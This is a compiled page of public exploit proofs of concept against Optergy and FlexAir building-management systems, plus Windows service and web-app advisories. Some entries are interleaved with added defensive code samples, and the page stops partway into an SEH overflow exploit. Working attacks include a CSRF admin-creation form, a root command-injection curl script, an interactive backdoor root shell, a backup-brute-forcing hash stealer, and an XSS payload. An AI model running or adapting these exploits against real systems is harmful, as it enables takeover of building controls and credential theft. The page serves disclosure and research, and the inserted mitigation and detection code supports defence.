
# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7273

# Optergy Proton/Enterprise BMS CSRF Add Admin

<!-- CSRF Add Admin Exploit -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
      <input type="hidden" name="user.accountEnabled" value="true" />
      <input type="hidden" name="user.username" value="testingus" />
      <input type="hidden" name="user.password" value="testingus" />
      <input type="hidden" name="confirmPassword" value="testingus" />
      <input type="hidden" name="user.firstname" value="Tester" />
      <input type="hidden" name="user.lastname" value="Testovski" />
      <input type="hidden" name="user.companyName" value="TEST Inc." />
      <input type="hidden" name="user.address" value="TestStr 17-251" />
      <input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
      <input type="hidden" name="user.departmentId" value="" />
      <input type="hidden" name="user.phoneNumber" value="1112223333" />
      <input type="hidden" name="user.mobileNumber" value="1233211234" />
      <input type="hidden" name="securityLevel" value="10" />
      <input type="hidden" name="user.showBanner" value="true" />
      <input type="hidden" name="user.showMenu" value="true" />
      <input type="hidden" name="user.showAlarmTab" value="true" />
      <input type="hidden" name="user.visibleAlarms" value="0" />
      <input type="hidden" name="user.showBookmarks" value="true" />
      <input type="hidden" name="user.showNotificationTab" value="true" />
      <input type="hidden" name="user.autoDismissFeedback" value="true" />
      <input type="hidden" name="user.canChangeBookmarks" value="true" />
      <input type="hidden" name="user.canChangePassword" value="true" />
      <input type="hidden" name="user.canUpdateProfile" value="true" />
      <input type="hidden" name="homepage-text" value="" />
      <input type="hidden" name="user.homePageType" value="" />
      <input type="hidden" name="user.homePage" value="" />
      <input type="hidden" name="background" value="" />
      <input type="hidden" name="user.backgroundImage-text" value="" />
      <input type="hidden" name="user.backgroundImage" value="" />
      <input type="hidden" name="user.backgroundTiled" value="" />
      <input type="hidden" name="user.backgroundColour" value="" />
      <input type="hidden" name="newMemberships" value="1" />
      <input type="hidden" name="user.id" value="" />
      <input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
      <input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
      <input type="hidden" name="newPrivileges" value="7" />
      <input type="hidden" name="newPrivileges" value="9" />
      <input type="hidden" name="newPrivileges" value="8" />
      <input type="hidden" name="newPrivileges" value="10" />
      <input type="hidden" name="newPrivileges" value="13" />
      <input type="hidden" name="newPrivileges" value="14" />
      <input type="hidden" name="newPrivileges" value="12" />
      <input type="hidden" name="newPrivileges" value="2" />
      <input type="hidden" name="newPrivileges" value="3" />
      <input type="hidden" name="newPrivileges" value="4" />
      <input type="hidden" name="newPrivileges" value="139" />
      <input type="hidden" name="newPrivileges" value="138" />
      <input type="hidden" name="newPrivileges" value="141" />
      <input type="hidden" name="newPrivileges" value="140" />
      <input type="hidden" name="newPrivileges" value="124" />
      <input type="hidden" name="newPrivileges" value="128" />
      <input type="hidden" name="newPrivileges" value="119" />
      <input type="hidden" name="newPrivileges" value="19" />
      <input type="hidden" name="newPrivileges" value="17" />
      <input type="hidden" name="newPrivileges" value="18" />
      <input type="hidden" name="newPrivileges" value="20" />
      <input type="hidden" name="newPrivileges" value="21" />
      <input type="hidden" name="newPrivileges" value="24" />
      <input type="hidden" name="newPrivileges" value="23" />
      <input type="hidden" name="newPrivileges" value="132" />
      <input type="hidden" name="newPrivileges" value="131" />
      <input type="hidden" name="newPrivileges" value="134" />
      <input type="hidden" name="newPrivileges" value="147" />
      <input type="hidden" name="newPrivileges" value="25" />
      <input type="hidden" name="newPrivileges" value="135" />
      <input type="hidden" name="newPrivileges" value="105" />
      <input type="hidden" name="newPrivileges" value="59" />
      <input type="hidden" name="newPrivileges" value="142" />
      <input type="hidden" name="newPrivileges" value="28" />
      <input type="hidden" name="newPrivileges" value="27" />
      <input type="hidden" name="newPrivileges" value="102" />
      <input type="hidden" name="newPrivileges" value="31" />
      <input type="hidden" name="newPrivileges" value="125" />
      <input type="hidden" name="newPrivileges" value="30" />
      <input type="hidden" name="newPrivileges" value="108" />
      <input type="hidden" name="newPrivileges" value="129" />
      <input type="hidden" name="newPrivileges" value="33" />
      <input type="hidden" name="newPrivileges" value="34" />
      <input type="hidden" name="newPrivileges" value="36" />
      <input type="hidden" name="newPrivileges" value="37" />
      <input type="hidden" name="newPrivileges" value="38" />
      <input type="hidden" name="newPrivileges" value="46" />
      <input type="hidden" name="newPrivileges" value="127" />
      <input type="hidden" name="newPrivileges" value="41" />
      <input type="hidden" name="newPrivileges" value="42" />
      <input type="hidden" name="newPrivileges" value="45" />
      <input type="hidden" name="newPrivileges" value="44" />
      <input type="hidden" name="newPrivileges" value="49" />
      <input type="hidden" name="newPrivileges" value="48" />
      <input type="hidden" name="newPrivileges" value="112" />
      <input type="hidden" name="newPrivileges" value="113" />
      <input type="hidden" name="newPrivileges" value="117" />
      <input type="hidden" name="newPrivileges" value="115" />
      <input type="hidden" name="newPrivileges" value="116" />
      <input type="hidden" name="newPrivileges" value="133" />
      <input type="hidden" name="newPrivileges" value="51" />
      <input type="hidden" name="newPrivileges" value="54" />
      <input type="hidden" name="newPrivileges" value="56" />
      <input type="hidden" name="newPrivileges" value="55" />
      <input type="hidden" name="newPrivileges" value="66" />
      <input type="hidden" name="newPrivileges" value="67" />
      <input type="hidden" name="newPrivileges" value="60" />
      <input type="hidden" name="newPrivileges" value="61" />
      <input type="hidden" name="newPrivileges" value="62" />
      <input type="hidden" name="newPrivileges" value="68" />
      <input type="hidden" name="newPrivileges" value="69" />
      <input type="hidden" name="newPrivileges" value="103" />
      <input type="hidden" name="newPrivileges" value="104" />
      <input type="hidden" name="newPrivileges" value="64" />
      <input type="hidden" name="newPrivileges" value="65" />
      <input type="hidden" name="newPrivileges" value="71" />
      <input type="hidden" name="newPrivileges" value="121" />
      <input type="hidden" name="newPrivileges" value="122" />
      <input type="hidden" name="newPrivileges" value="85" />
      <input type="hidden" name="newPrivileges" value="86" />
      <input type="hidden" name="newPrivileges" value="74" />
      <input type="hidden" name="newPrivileges" value="76" />
      <input type="hidden" name="newPrivileges" value="144" />
      <input type="hidden" name="newPrivileges" value="75" />
      <input type="hidden" name="newPrivileges" value="77" />
      <input type="hidden" name="newPrivileges" value="78" />
      <input type="hidden" name="newPrivileges" value="79" />
      <input type="hidden" name="newPrivileges" value="73" />
      <input type="hidden" name="newPrivileges" value="143" />
      <input type="hidden" name="newPrivileges" value="109" />
      <input type="hidden" name="newPrivileges" value="110" />
      <input type="hidden" name="newPrivileges" value="88" />
      <input type="hidden" name="newPrivileges" value="89" />
      <input type="hidden" name="newPrivileges" value="90" />
      <input type="hidden" name="newPrivileges" value="118" />
      <input type="hidden" name="newPrivileges" value="95" />
      <input type="hidden" name="newPrivileges" value="93" />
      <input type="hidden" name="newPrivileges" value="96" />
      <input type="hidden" name="newPrivileges" value="94" />
      <input type="hidden" name="newPrivileges" value="92" />
      <input type="hidden" name="newPrivileges" value="98" />
      <input type="hidden" name="newPrivileges" value="99" />
      <input type="hidden" name="newPrivileges" value="146" />
      <input type="hidden" name="newPrivileges" value="100" />
      <input type="submit" value="Forgery" />
    </form>
  </body>
</html>
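The PoC above works because the add-user action accepts any POST that arrives with the administrator's session cookie, whatever page submitted it. The following is an added example, not Optergy's code and not part of the advisory: it models that handler in miniature beside a hardened version that checks the Origin (or Referer) header against the site origin and verifies a session-bound synchronizer token in constant time. The session secret, session id, attacker host and Referer paths are constructed for the example; only the BMS origin and the form field names come from the PoC.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed values for the example: the BMS origin from the PoC, a server-side
# secret and a session id (none of these come from the advisory).
SITE_ORIGIN = "http://192.168.232.19"
SESSION_SECRET = b"server-side-secret-not-sent-to-clients"
VICTIM_SESSION = {"id": "sess-1234", "authenticated": True}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session id).
    Embedded in the admin form as a hidden field; an attacker's page cannot read it."""
    return hmac.new(SESSION_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def add_user_vulnerable(headers: dict, form: dict, session: dict) -> bool:
    """The weakness the PoC exploits: the browser attaches the admin's session cookie
    to the forged POST and that cookie is the only thing checked (headers unused)."""
    if not session.get("authenticated"):
        return False
    return bool(form.get("user.username")) and form.get("securityLevel") == "10"


def add_user_hardened(headers: dict, form: dict, session: dict) -> bool:
    """Two independent checks before the state change:
    1. Origin (or Referer) must be the site's own origin; absent means reject.
    2. The form must carry the session-bound token, compared in constant time."""
    if not session.get("authenticated"):
        return False
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False
    expected = issue_csrf_token(session["id"])
    if not hmac.compare_digest(expected, form.get("csrf_token", "")):
        return False
    return bool(form.get("user.username")) and form.get("securityLevel") == "10"


# The PoC's request as the server sees it (cross-origin, no token) and a legitimate
# same-origin one; headers and paths are constructed.
POC_HEADERS = {"Origin": "http://attacker.example", "Referer": "http://attacker.example/csrf.html"}
POC_FORM = {"user.username": "testingus", "user.password": "testingus", "securityLevel": "10"}
LEGIT_HEADERS = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/controlPanel/UserAdministration.html"}
LEGIT_FORM = dict(POC_FORM, csrf_token=issue_csrf_token(VICTIM_SESSION["id"]))


def demo() -> dict:
    return {
        "poc_vulnerable": add_user_vulnerable(POC_HEADERS, POC_FORM, VICTIM_SESSION),
        "poc_hardened": add_user_hardened(POC_HEADERS, POC_FORM, VICTIM_SESSION),
        "legit_hardened": add_user_hardened(LEGIT_HEADERS, LEGIT_FORM, VICTIM_SESSION),
    }


if __name__ == "__main__":
    print(demo())
```

Browsers always send Origin on cross-origin POSTs, so rejecting requests that carry neither Origin nor Referer is safe for state-changing endpoints; marking the session cookie SameSite=Lax is a third, independent layer, but it does not replace the token on an appliance that older browsers will still talk to.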
            
# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# PoC

#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38

#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################
# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
# Command to execute
CMD="$2"
# IP address
IP="$1"
# Change HTTP to HTTPS if required
HOST="http://${IP}"
# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"

# Perform exploit
echo "Executing: ${CMD}"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"
# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
echo "Done"
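The script injects `;<command>` into the GoogleAccessToken parameter, so the firmware must be handing that value to a shell. The following is an added example, not Prima/Computrols code and not part of the advisory: it parses the same XML request shape, passes the token through a shell command line the way the vulnerable code must, and then through a no-shell call behind an allowlist. `echo` stands in for whatever the firmware actually executes (the advisory does not name it), and the request body is constructed; both are assumptions.

```python
import subprocess
import xml.etree.ElementTree as ET

# Constructed request body in the shape the script above posts to /bin/sysfcgi.fx.
INJECTED_REQUEST = (
    "<requests><request name='LoginUser'>"
    "<param name='UsrName' value='test'/>"
    "<param name='UsrEMail' value='test@test.com'/>"
    "<param name='GoogleAccessToken' value='test;id'/>"
    "</request></requests>"
)


def extract_token(xml_body: str) -> str:
    """Return the GoogleAccessToken value from a LoginUser request."""
    root = ET.fromstring(xml_body)
    for param in root.iter("param"):
        if param.get("name") == "GoogleAccessToken":
            return param.get("value", "")
    raise ValueError("no GoogleAccessToken parameter")


def validate_token_vulnerable(token: str) -> str:
    """Assumed shape of the bug: the token is spliced into a command line that a
    shell parses. 'echo' stands in for the real tool; ';' ends it and the rest of
    the token runs as a second command, as root when the daemon runs as root."""
    result = subprocess.run("echo " + token, shell=True, capture_output=True, text=True)
    return result.stdout


def run_validator_argv(token: str) -> str:
    """Same call with no shell: the token is one argv element, so ';' is just a byte."""
    result = subprocess.run(["echo", token], capture_output=True, text=True)
    return result.stdout


def validate_token_hardened(token: str) -> str:
    """Allowlist first (OAuth tokens use URL-safe characters), then the no-shell call."""
    if not token or not all(c.isalnum() or c in "-._~" for c in token):
        raise ValueError("rejected token: " + repr(token))
    return run_validator_argv(token)


if __name__ == "__main__":
    token = extract_token(INJECTED_REQUEST)
    print("vulnerable:", validate_token_vulnerable(token))
    print("argv only :", run_validator_argv(token))
    try:
        validate_token_hardened(token)
    except ValueError as exc:
        print("hardened  :", exc)
```

The argv form alone already defeats the `;` trick; the allowlist is there so that a token containing shell metacharacters never reaches a subprocess at all, which is the check to look for when reviewing a fix for this class of bug.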
            
# Title: Optergy 2.3.0a - Username Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7272

# PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>
            
# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.realtek.com/en/
# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
# Version: 6.4.10041.133 
# Tested on: Windows 10 Home Single Language
# CVE : N/A

# Explot-Realtek.txt

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
RTK IIS Codec Service	RtkI2SCodec	C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe	Auto

C:\Users\user>sc query RtkI2SCodec

SERVICE_NAME: RtkI2SCodec
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
            
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7276

# PoC:

#!/usr/bin/env python3
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#

import os
import sys
import json
import hashlib
import requests

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print('\n  [*] Usage: ' + piton + ' <ip:port>\n')
    sys.exit()

while True:

    # Every command needs a fresh challenge from the unauthenticated console endpoint.
    challenge_url = 'http://' + sys.argv[1] + '/tools/ajax/ConsoleResult.html?get'

    try:
        req1 = requests.get(challenge_url)
        get_challenge = json.loads(req1.text)
        challenge = get_challenge['response']['message']
        print('Challenge received: ' + challenge)

        # The backdoor accepts sha1(challenge) followed by md5(sha1(challenge)) as the answer.
        h1 = hashlib.sha1(challenge.encode()).hexdigest()
        print('SHA1: ' + h1)
        h2 = hashlib.md5(h1.encode()).hexdigest()
        print('MD5 from SHA1: ' + h2)
        print('Answer: ' + h1 + h2)

        zeTargets = 'http://' + sys.argv[1] + '/tools/ajax/ConsoleResult.html'
        zeCommand = input('# ')
        if zeCommand.strip() == 'exit':
            sys.exit()
        zeHeaders = {'User-Agent'      : 'BB/BMS-251.4ev4h',
                     'Accept'          : '*/*',
                     'Accept-Encoding' : 'gzip, deflate',
                     'Accept-Language' : 'mk-MK,mk;q=1.7',
                     'Connection'      : 'keep-alive',
                     'Connection-Type' : 'application/x-www-form-urlencoded'}
        # The console runs the command through sudo, hence the root shell.
        zePardata = {'command'         : 'sudo ' + zeCommand,
                     'challenge'       : challenge,
                     'answer'          : h1 + h2}

        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
        get_resp = json.loads(zeRequest.text)
        get_answ = get_resp['response']['message']
        print(get_answ)
    except Exception:
        print('[*] Error!')
        break
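From the defender's side, the handshake above leaves a distinctive trace even without request bodies: a GET of ConsoleResult.html?get followed within seconds by a POST to ConsoleResult.html from the same client, once per command. The following is an added example, not part of the advisory, that runs that correlation over access-log lines in Common Log Format; the sample lines are constructed for the example and only the two URL paths come from the exploit.

```python
import re
from collections import defaultdict
from datetime import datetime

CONSOLE = "/tools/ajax/ConsoleResult.html"

# Constructed access-log lines (Common Log Format); not logs from the advisory.
# 10.0.0.9 runs two commands through the backdoor; 10.0.0.5 only browses.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2019:10:14:01 +0000] "GET /Login.html HTTP/1.1" 200 5120
10.0.0.9 - - [05/Nov/2019:10:14:03 +0000] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 200 64
10.0.0.9 - - [05/Nov/2019:10:14:04 +0000] "POST /tools/ajax/ConsoleResult.html HTTP/1.1" 200 128
10.0.0.9 - - [05/Nov/2019:10:14:09 +0000] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 200 64
10.0.0.9 - - [05/Nov/2019:10:14:10 +0000] "POST /tools/ajax/ConsoleResult.html HTTP/1.1" 200 2048
10.0.0.5 - - [05/Nov/2019:10:15:30 +0000] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 200 64
10.0.0.5 - - [05/Nov/2019:11:20:00 +0000] "POST /tools/ajax/ConsoleResult.html HTTP/1.1" 200 90
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(line: str):
    """(ip, timestamp, method, path, status) for one CLF line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect_console_backdoor(log_text: str, window_seconds: int = 30) -> dict:
    """Return {client_ip: commands} for clients that fetched a console challenge and
    posted to the console within window_seconds. The endpoint needs no session, so no
    legitimate workflow produces the pair; any hit is worth an alert."""
    last_challenge = {}
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "GET" and path == CONSOLE + "?get":
            last_challenge[ip] = ts  # challenge issued; the answer must follow quickly
        elif method == "POST" and path == CONSOLE and status == 200:
            issued = last_challenge.pop(ip, None)
            if issued is not None and (ts - issued).total_seconds() <= window_seconds:
                hits[ip] += 1
    return dict(hits)


if __name__ == "__main__":
    print(detect_console_backdoor(SAMPLE_LOG))
```

If the logs are in combined format, the fixed User-Agent the exploit sends, BB/BMS-251.4ev4h, is a cheap extra indicator, but the challenge/answer pairing is the one that survives a changed User-Agent.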
            
# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

#!/usr/bin/env python3
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetching the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db 
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$ 
#
###################################################################################
#
# 11.01.2019
#

import os
import sys
import time
import requests

from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    print('[+] Usage: ' + piton + ' [target]')
    print('[+] Target example 1: http://10.0.0.17:8080')
    print('[+] Target example 2: https://primanova.tld\n')
    sys.exit()

host = sys.argv[1]

def datum(start_date, end_date):
    # Yield every day in [start_date, end_date): the backup name is just the creation date.
    for n in range(int((end_date - start_date).days)):
        yield start_date + timedelta(n)

start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)

print('[+] Please wait while fetching the backup config file...')

def spinning_cursor():
    while True:
        for cursor in '|/-\\':
            yield cursor

spinner = spinning_cursor()

for mooshoo in datum(start_date, end_date):
    sys.stdout.write(next(spinner))
    sys.stdout.flush()
    time.sleep(0.1)
    sys.stdout.write('\b')
    name = 'Nova_Config_' + mooshoo.strftime('%Y-%m-%d') + '.bck'
    h = requests.get(host + '/links/' + name, verify=False)

    if h.status_code == 200:
        print('[+] Found some juice!')
        print('[+] Downloading: ' + host + '/links/' + name)
        timestr = time.strftime('%H%M%S')
        time.sleep(1)
        outfile = name + '-' + timestr + '.db'
        with open(outfile, 'wb') as f:
            f.write(h.content)
        print('[+] Saved as: ' + outfile)
        sys.exit()

print('[-] No backup for you today. :(')
            
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple

# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.

URL
====================
https://<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0

Parameter
====================
ReportId

Attack Type
====================
Remote

CVE Impact Other
====================
Allows an attacker to inject JavaScript that can steal cookies, redirect
users to a malicious website, etc.

Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html

Discoverer
====================
Rishu Ranjan
            
# Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquoted Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A

#Service Info:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Application Framework Service	WsAppService	C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe	Auto


C:\Users\user>sc query WsAppService

SERVICE_NAME: WsAppService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
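Both unquoted-path advisories on this page (RtkI2SCodec above and WsAppService here) come down to one check: an auto-start service whose ImagePath is unquoted and contains spaces, so that CreateProcess tries each space-delimited prefix, with .exe appended, before the real binary. The following is an added example, not from either advisory: it parses wmic rows of the shape shown above and lists the hijack candidates per service. The four sample rows are constructed; the two vulnerable paths are copied from the advisories, the other two are made up for contrast.

```python
# Constructed wmic rows: DisplayName, Name, PathName, StartMode separated by tabs, the
# column order wmic prints for the command used in the advisories.
SAMPLE_WMIC = "\n".join("\t".join(row) for row in [
    ("RTK IIS Codec Service", "RtkI2SCodec",
     r"C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe", "Auto"),
    ("Wondershare Application Framework Service", "WsAppService",
     r"C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe", "Auto"),
    ("Quoted Example", "QuotedSvc", r'"C:\Program Files\Vendor\svc.exe" -run', "Auto"),
    ("Plain Example", "PlainSvc", r"C:\Vendor\svc.exe", "Auto"),
])


def hijack_candidates(pathname: str) -> list:
    """Paths Windows tries before the intended executable when the ImagePath is
    unquoted: for every space in the executable part, the prefix up to that space
    plus '.exe'. Returns [] for a quoted or space-free path."""
    path = pathname.strip()
    if not path or path.startswith('"'):
        return []
    idx = path.lower().find(".exe")
    exe = path[: idx + 4] if idx != -1 else path  # drop any arguments after the binary
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit_wmic(output: str) -> dict:
    """{service_name: [candidate paths]} for auto-start services with an unquoted path."""
    findings = {}
    for line in output.splitlines():
        cols = line.split("\t")
        if len(cols) != 4:
            continue
        display, name, pathname, startmode = (c.strip() for c in cols)
        if startmode.lower() != "auto":
            continue
        candidates = hijack_candidates(pathname)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for svc, paths in audit_wmic(SAMPLE_WMIC).items():
        print(svc)
        for p in paths:
            print("   ", p)
```

A finding is only exploitable if a low-privileged user can create a file at one of the candidate paths and then get the service restarted (or the host rebooted), after which the planted binary runs with the service account's privileges. On a default install ordinary users cannot create files in the root of the system drive, so check the ACL of each candidate's parent directory with icacls rather than assuming `C:\Program.exe` is writable.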
            
# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)
# Date: 2019-11-09
# Exploit Author: Samir sanchez garnica @sasaga92
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
# Version: 6.2.9
# Tested: Windows 10 pro N and Windows XP SP3
# CVE : N/A

#!/usr/bin/env python3
'''
A stack-based buffer overflow exists in the "create user" module: pasting a sufficiently
long string into the username/name field is not bounds-checked by the software, and the
SEH record is overwritten.
'''

import random
import string
import struct
import argparse


def pattern_create(_type, _length):
    """Build a filler of _length bytes: "trash X" repeats the byte X, "random" gives
